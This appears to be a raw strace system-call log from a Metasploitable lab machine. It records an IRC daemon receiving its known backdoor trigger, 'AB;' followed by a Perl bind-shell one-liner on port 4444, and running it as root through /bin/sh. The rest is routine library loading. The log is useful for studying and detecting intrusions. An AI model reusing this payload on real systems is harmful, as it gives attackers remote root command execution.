4519  07:42:09.051946 select(1024, [2 3 4 7 9], [], NULL, {0, 660000}) = 1 (in [2], left {0, 520000})

4519  07:42:09.199096 clock_gettime(CLOCK_MONOTONIC, {2939, 16128162}) = 0

4519  07:42:09.199145 accept(2, 0, NULL) = 5

4519  07:42:09.199181 getpeername(5, {sa_family=AF_INET, sin_port=htons(34155), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:42:09.199222 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:42:09.199235 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:42:09.199249 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:42:09.199349 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:42:09.199388 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:42:09.199399 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:42:09.199431 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:42:09.199448 clock_gettime(CLOCK_MONOTONIC, {2939, 16461862}) = 0

4519  07:42:09.199460 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:42:09.199473 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:42:09.199482 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:42:09.199492 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:42:09.199502 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:42:09.199518 send(6, "\202\302\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:42:09.199536 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:42:09.199620 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:42:09.199714 gettimeofday({1495626129, 199719}, NULL) = 0

4519  07:42:09.199728 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:42:09.203040 clock_gettime(CLOCK_MONOTONIC, {2939, 20073776}) = 0

4519  07:42:09.203073 recvfrom(6, "\202\302\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0+\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:42:09.203115 close(6)          = 0

4519  07:42:09.203150 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:42:09.203180 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:42:09.203230 time(NULL)        = 1495626129

4519  07:42:09.203243 time(NULL)        = 1495626129

4519  07:42:09.203258 gettimeofday({1495626129, 203262}, NULL) = 0

4519  07:42:09.203270 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:42:09.203300 clock_gettime(CLOCK_MONOTONIC, {2939, 20312966}) = 0

4519  07:42:09.203311 gettimeofday({1495626129, 203314}, NULL) = 0

4519  07:42:09.203322 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:42:09.203361 clock_gettime(CLOCK_MONOTONIC, {2939, 20373864}) = 0

4519  07:42:09.203373 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:42:09.203401 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:42:09.203435 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:42:09.203448 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:42:09.203464 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12376

12376 07:42:09.203536 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12376 07:42:09.203551 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12376 07:42:09.203562 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12376 07:42:09.203576 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12376 07:42:09.203696 brk(0)            = 0x80f9000

12376 07:42:09.203720 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.203736 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000

12376 07:42:09.203753 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.203770 open("/etc/ld.so.cache", O_RDONLY) = 1

12376 07:42:09.203783 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12376 07:42:09.203802 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7eee000

12376 07:42:09.203813 close(1)          = 0

12376 07:42:09.203824 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.203840 open("/lib/libncurses.so.5", O_RDONLY) = 1

12376 07:42:09.203853 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12376 07:42:09.203957 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12376 07:42:09.203975 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ebe000

12376 07:42:09.203988 mmap2(0xb7eeb000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7eeb000

12376 07:42:09.204005 close(1)          = 0

12376 07:42:09.204017 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.204032 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12376 07:42:09.204046 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12376 07:42:09.204136 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12376 07:42:09.204153 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eba000

12376 07:42:09.204165 mmap2(0xb7ebc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ebc000

12376 07:42:09.204181 close(1)          = 0

12376 07:42:09.204196 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.204210 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12376 07:42:09.204224 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12376 07:42:09.204313 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12376 07:42:09.204329 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eb9000

12376 07:42:09.204343 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6a000

12376 07:42:09.204355 mmap2(0xb7eb3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eb3000

12376 07:42:09.204370 mmap2(0xb7eb6000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb6000

12376 07:42:09.204384 close(1)          = 0

12376 07:42:09.204407 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d69000

12376 07:42:09.204419 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d696b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12376 07:42:09.204516 mprotect(0xb7eb3000, 4096, PROT_READ) = 0

12376 07:42:09.204555 munmap(0xb7eee000, 29913) = 0

12376 07:42:09.204581 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12376 07:42:09.204595 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12376 07:42:09.204616 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd01ec0) = -1 ENOTTY (Inappropriate ioctl for device)

12376 07:42:09.204651 brk(0)            = 0x80f9000

12376 07:42:09.204660 brk(0x80fa000)    = 0x80fa000

12376 07:42:09.204672 brk(0x80fb000)    = 0x80fb000

12376 07:42:09.204689 getuid32()        = 0

12376 07:42:09.204698 getgid32()        = 0

12376 07:42:09.204707 geteuid32()       = 0

12376 07:42:09.204716 getegid32()       = 0

12376 07:42:09.204730 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12376 07:42:09.204743 time(NULL)        = 1495626129

12376 07:42:09.204756 brk(0x80fc000)    = 0x80fc000

12376 07:42:09.204771 brk(0x80fd000)    = 0x80fd000

12376 07:42:09.204790 open("/proc/meminfo", O_RDONLY) = 1

12376 07:42:09.204812 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12376 07:42:09.204830 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef5000

12376 07:42:09.204842 read(1, "MemTotal:      1035240 kB\nMemFree:        322532 kB\nBuffers:         87968 kB\nCached:         463608 kB\nSwapCached:          0 kB\nActive:         257956 kB\nInactive:       422548 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        322292 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4836 kB\nWriteback:           0 kB\nAnonPages:      128968 kB\nMapped:          51956 kB\nSlab:            20988 kB\nSReclaimable:    12136 kB\nSUnreclaim:       8852 kB\nPageTables:       1940 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12376 07:42:09.204930 close(1)          = 0

12376 07:42:09.204951 munmap(0xb7ef5000, 4096) = 0

12376 07:42:09.204963 brk(0x80fe000)    = 0x80fe000

12376 07:42:09.204990 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12376 07:42:09.205003 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12376 07:42:09.205015 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12376 07:42:09.205027 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12376 07:42:09.205039 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12376 07:42:09.205051 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12376 07:42:09.205065 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12376 07:42:09.205076 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12376 07:42:09.205089 uname({sys="Linux", node="metasploitable", ...}) = 0

12376 07:42:09.205137 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12376 07:42:09.205155 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12376 07:42:09.205174 brk(0x8100000)    = 0x8100000

12376 07:42:09.205185 getcwd("/etc/unreal", 4096) = 12

12376 07:42:09.205200 getpid()          = 12376

12376 07:42:09.205216 getppid()         = 4519

12376 07:42:09.205232 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12376 07:42:09.205252 stat64("/sbin/sh", 0xbfd01e98) = -1 ENOENT (No such file or directory)

12376 07:42:09.205265 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12376 07:42:09.205282 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12376 07:42:09.205306 socket(PF_FILE, SOCK_STREAM, 0) = 1

12376 07:42:09.205320 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12376 07:42:09.205332 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12376 07:42:09.205354 close(1)          = 0

12376 07:42:09.205365 socket(PF_FILE, SOCK_STREAM, 0) = 1

12376 07:42:09.205375 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12376 07:42:09.205386 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12376 07:42:09.205404 close(1)          = 0

12376 07:42:09.205417 open("/etc/nsswitch.conf", O_RDONLY) = 1

12376 07:42:09.205441 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12376 07:42:09.205458 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef5000

12376 07:42:09.205469 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12376 07:42:09.205519 read(1, "", 4096) = 0

12376 07:42:09.205529 close(1)          = 0

12376 07:42:09.205539 munmap(0xb7ef5000, 4096) = 0

12376 07:42:09.205555 open("/etc/ld.so.cache", O_RDONLY) = 1

12376 07:42:09.205568 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12376 07:42:09.205584 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7eee000

12376 07:42:09.205594 close(1)          = 0

12376 07:42:09.205605 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.205620 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12376 07:42:09.205635 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12376 07:42:09.205728 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12376 07:42:09.205745 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d60000

12376 07:42:09.205757 mmap2(0xb7d67000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d67000

12376 07:42:09.205774 close(1)          = 0

12376 07:42:09.205786 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.205799 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12376 07:42:09.205813 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12376 07:42:09.205900 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12376 07:42:09.205917 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d48000

12376 07:42:09.205936 mmap2(0xb7d5c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d5c000

12376 07:42:09.205978 mmap2(0xb7d5e000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d5e000

12376 07:42:09.206006 close(1)          = 0

12376 07:42:09.206033 munmap(0xb7eee000, 29913) = 0

12376 07:42:09.206050 open("/etc/ld.so.cache", O_RDONLY) = 1

12376 07:42:09.206063 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12376 07:42:09.206079 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7eee000

12376 07:42:09.206089 close(1)          = 0

12376 07:42:09.206100 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12376 07:42:09.206114 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12376 07:42:09.206129 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12376 07:42:09.206222 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12376 07:42:09.206239 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d3e000

12376 07:42:09.206251 mmap2(0xb7d46000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d46000

12376 07:42:09.206267 close(1)          = 0

12376 07:42:09.206279 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

